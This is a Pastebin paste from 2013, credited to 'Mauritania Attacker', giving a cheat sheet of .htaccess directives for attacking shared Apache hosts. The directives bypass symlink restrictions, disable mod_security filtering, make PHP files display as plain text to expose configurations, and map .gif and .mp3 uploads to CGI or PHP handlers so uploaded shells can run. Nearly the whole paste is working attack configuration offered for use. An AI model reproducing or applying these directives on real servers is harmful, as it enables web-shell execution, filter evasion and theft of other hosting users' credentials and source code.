API tools faq
paste
Advertisement
Guest User

Bypass Symlink Private 2013

a guest
Jan 18th, 2013
2,638
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.27 KB | None | 0 0
raw download clone embed print report
  1. *********************Bypass Symlink with .htaccess bY Mauritania Attacker************************
  2.  
  3. i will write down for you all .htaccess possible
  4.  
  5.  
  6.  
  7.  
  8. * Options FollowSymLinks MultiViews Indexes ExecCGI
  9.  
  10. * Options Indexes FollowSymLinks DirectoryIndex ssssss.htm AddType txt .php AddHandler txt .php
  11.  
  12. * Options All DirectoryIndex ssss.html addType txt .php AddHandler txt .php <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>
  13.  
  14. * Options All ReadMeName 1.txt
  15.  
  16. * suPHP_ConfigPath /home/user/public_html/php.ini
  17.  
  18. * Options all
  19.  
  20. * Options +FollowSymLinks DirectoryIndex Sux.html Options +Indexes AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html
  21.  
  22. * Options Indexes FollowSymLinks DirectoryIndex ssssss.htm AddType txt .php AddHandler txt .php <IfModule mod_autoindex.c> IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble </ifModule> <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>
  23.  
  24. This one is to make python work :
  25.  
  26. * AddType application/x-httpd-cgi .py AddHandler cgi-script .py AddHandler cgi-script .py
  27.  
  28. This one is to make perl work :
  29.  
  30. * AddType application/x-httpd-cgi .pl AddHandler cgi-script .pl AddHandler cgi-script .pl
  31.  
  32. This one is to enable Symlink if the function is disabled in the server :
  33.  
  34.  
  35. * <Directory "/home"> *** Options -ExecCGI* *** AllowOverride AuthConfig Indexes Limit FileInfo Options=IncludesNOEXEC,Indexes,Includes,MultiViews ,SymLinksIfOwnerMatch,FollowSymLinks </Directory>
  36.  
  37. This one is to retrieve users permissions :
  38.  
  39. * AddType text/plain .php Options +Indexes DirectoryIndex filename.html
  40.  
  41. * Bypass Internal Server error :
  42.  
  43. <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>
  44.  
  45. * Change php version :
  46.  
  47. AddType application/x-httpd-php4 .php
  48.  
  49. * Bypass Uploads Options and upload shell in another extension :
  50.  
  51. <FilesMatch "^.*\.mp3"> SetHandler application/x-httpd-php </FilesMatch>
  52.  
  53. * Retrieve Config with picture method :
  54.  
  55. Options FollowSymLinks MultiViews Indexes ExecCGI
  56. AddType application/x-httpd-cgi .gif
  57. AddHandler cgi-script .gif
  58. AddHandler cgi-script .gif
  59.  
  60.  
  61.  
  62. *This is just few information for more information contact me on facebook:
  63.  
  64. https://www.facebook.com/mauritanie.forever
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!